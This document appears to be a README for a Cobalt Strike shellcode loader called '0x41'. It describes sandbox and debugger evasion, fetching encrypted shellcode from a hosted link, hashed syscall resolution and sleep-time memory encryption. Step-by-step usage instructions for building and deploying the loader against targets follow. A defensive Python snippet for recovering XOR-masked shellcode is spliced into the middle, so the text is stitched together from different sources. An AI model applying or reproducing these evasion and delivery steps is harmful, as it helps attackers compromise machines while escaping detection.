THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

Overview

How Does 0x41 work:

1- checks the environment [detects sandboxes / debuggers / virtual machines]

2- downloads the [encrypted] shellcode file [.bin] if the check succeeded

3- resolves the syscalls it needs dynamically through hashes, not through predefined code.

4- reads / loads the binary into memory [still not executed]. Note that decryption and injection happen together.

5- sleeps for 10 seconds [you can modify this to fit your needs]

6- launches the shellcode:

a. the shellcode is launched for a couple of milliseconds only, so that we get a confirmation that we accessed the target.

b. after the heartbeat is sent, we generate a random byte [which will be used to encrypt the shellcode], move the shellcode to "page no access", and encrypt it with the random byte generated earlier.

c. when the sleep configured on our server is done, we move the shellcode back to "rwx", decode it with our key, and execute the commands [if any were sent]

d. then it repeats these steps, with a different encryption key every time.
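The single-byte key in step 6b is the weak point a memory-forensics tool can lean on: there are only 256 possible keys, and native code is dominated by 0x00 bytes, so the most frequent byte of the masked region usually is the key. The following is an added example, not code from this project; it assumes the masking is XOR with that byte (the README does not name the operation) and uses the commonly documented x64 stager prologue bytes as the recognition signature.

```python
from collections import Counter

# Commonly documented opening bytes of a raw x64 stager (cld; and rsp,-0x10; ...).
# Used here as a recognition signature; assumption: the masked buffer begins with it.
X64_PROLOGUE = bytes.fromhex("fc4883e4f0")

# Constructed sample standing in for a raw payload: the prologue, a run of zero
# bytes (typical of immediates and padding in real code) and some filler.
SAMPLE_PLAIN = bytes.fromhex("fc4883e4f0e8c0000000") + b"\x00" * 20 + bytes(range(0x20, 0x40))


def xor_single(buf: bytes, key: int) -> bytes:
    """Mask or unmask a buffer with one key byte (XOR is its own inverse)."""
    return bytes(b ^ key for b in buf)


def guess_key_by_frequency(buf: bytes) -> int:
    """Most frequent ciphertext byte: native code is usually dominated by 0x00,
    and 0x00 XOR key == key, so this is the likely key without any search."""
    return Counter(buf).most_common(1)[0][0]


def recover(buf: bytes, signature: bytes = X64_PROLOGUE):
    """Return (key, plaintext) for a single-byte-XOR masked region, or None.

    Tries the frequency guess first, then every key 0..255. Key 0 is included:
    a loader that draws a random byte may draw zero, leaving the region unmasked.
    """
    candidates = [guess_key_by_frequency(buf)] + list(range(256))
    for key in candidates:
        plain = xor_single(buf, key)
        if plain.startswith(signature):
            return key, plain
    return None


if __name__ == "__main__":
    masked = xor_single(SAMPLE_PLAIN, 0x5A)  # stand-in for a captured masked region
    key, plain = recover(masked)
    print(f"key=0x{key:02x}, recovered {len(plain)} bytes, prologue ok={plain[:5] == X64_PROLOGUE}")
```

Because the key is redrawn every sleep cycle, the frequency guess has to be recomputed per captured region; the signature check is what confirms a hit.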

USAGE:

  1. first load the profile using the following command: ./teamserver.sh .

  2. run Cobalt Strike: ./cobaltstrike.sh .

  3. generate your payload [preferably HTTPS]; it must be created as x64 in raw file format: Attacks -> Packages -> Payload Generator. Save it as payload.bin

  4. move the payload.bin file created earlier to the same directory as binencoder.py

  5. run binencoder.py using python2

  6. upload the result.bin file to (github / gitlab / pastebin ..etc..) and copy the 'raw' link or the 'download' link of the result.bin file.

  7. paste it in line 116 in utils.h; e.g. it should look like [if from gitlab.com]: "https://gitlab.com/username/reponame/-/raw/main/result.bin?inline=false"

  8. build it as release x64

  9. enjoy !
